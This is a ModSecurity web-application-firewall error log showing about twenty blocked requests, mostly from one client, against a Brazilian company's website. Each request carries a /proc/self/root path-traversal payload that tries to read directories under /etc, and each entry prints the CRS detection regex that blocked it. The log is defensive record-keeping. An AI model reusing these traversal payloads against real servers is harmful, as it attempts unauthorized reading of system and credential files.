[Mon Mar 16 12:37:20.292051 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:36614] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjsAlT9VtDQc7bgUywjQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:21.583334 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:45318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjsf9ocpUE4ed4uDzudgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:25.260755 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:45326] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjtNSswJuvopo3lOhdqAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:26.616262 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:45334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjtrysWC90G-1nBrBEVAAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:31.844984 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:45344] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgju7ABkC4fWIHEf8HpjAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:35.107900 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:57244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjv_9ocpUE4ed4uDzuewAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:36.405683 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:57252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjwNSswJuvopo3lOhdqgAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:37.539052 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.241.46:57256] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjwXbQATo66fKoS7xOTQAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:38.862381 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:42366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjwrysWC90G-1nBrBEWAAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:40.039628 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:42370] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjxI6lpbStxTqkSktrbAAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:42.197164 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.241.46:42372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjxo6lpbStxTqkSktrbgAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:47.718323 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:45170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjy5qj1wV0Si-Okefs_wAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:53.591389 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.241.46:42388] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj0Zqj1wV0Si-OkeftBgAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:54.922310 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:34248] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj0o6lpbStxTqkSktrcwAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:58.435401 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:34252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj1rABkC4fWIHEf8HpkQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:04.412573 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:38980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj3LysWC90G-1nBrBEXwAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:06.819447 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.241.46:38986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj3nbQATo66fKoS7xOUgAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:08.087407 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:38994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj4LABkC4fWIHEf8HplgAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:11.299910 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.241.46:51400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj4xXjF1vJNtV6CWr05wAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:15.674695 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:51404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj5_9ocpUE4ed4uDzuigAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:16.938391 2026] [:error] [pid 10709:tid 140411716749056] [client 74.7.241.46:51414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj6BXjF1vJNtV6CWr06gAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:20.299425 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:47678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj7P9ocpUE4ed4uDzujgAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:21.591136 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.241.46:47686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj7RXjF1vJNtV6CWr07QAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:24.692246 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:47702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj8LABkC4fWIHEf8HpmwAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
